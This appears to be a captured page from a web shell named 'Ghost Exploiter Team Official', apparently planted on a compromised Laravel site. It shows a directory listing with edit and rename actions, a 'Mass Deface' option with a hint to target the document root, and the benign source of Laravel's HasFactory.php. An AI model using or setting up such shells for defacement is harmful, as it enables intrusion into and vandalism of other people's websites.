webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Database
/
Eloquent
/
Factories
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BelongsToManyRelationsh
...
2.028KB
edt
ren
BelongsToRelationship.php
2.677KB
edt
ren
CrossJoinSequence.php
0.528KB
edt
ren
Factory.php
28.674KB
edt
ren
HasFactory.php
0.841KB
edt
ren
Relationship.php
2.102KB
edt
ren
Sequence.php
1.109KB
edt
ren
<?php namespace Illuminate\Database\Eloquent\Factories; trait HasFactory { /** * Get a new factory instance for the model. * * @param callable|array|int|null $count * @param callable|array $state * @return \Illuminate\Database\Eloquent\Factories\Factory<static> */ public static function factory($count = null, $state = []) { $factory = static::newFactory() ?: Factory::factoryForModel(get_called_class()); return $factory ->count(is_numeric($count) ? $count : null) ->state(is_callable($count) || is_array($count) ? $count : $state); } /** * Create a new factory instance for the model. * * @return \Illuminate\Database\Eloquent\Factories\Factory<static> */ protected static function newFactory() { // } }
<=Back
Liking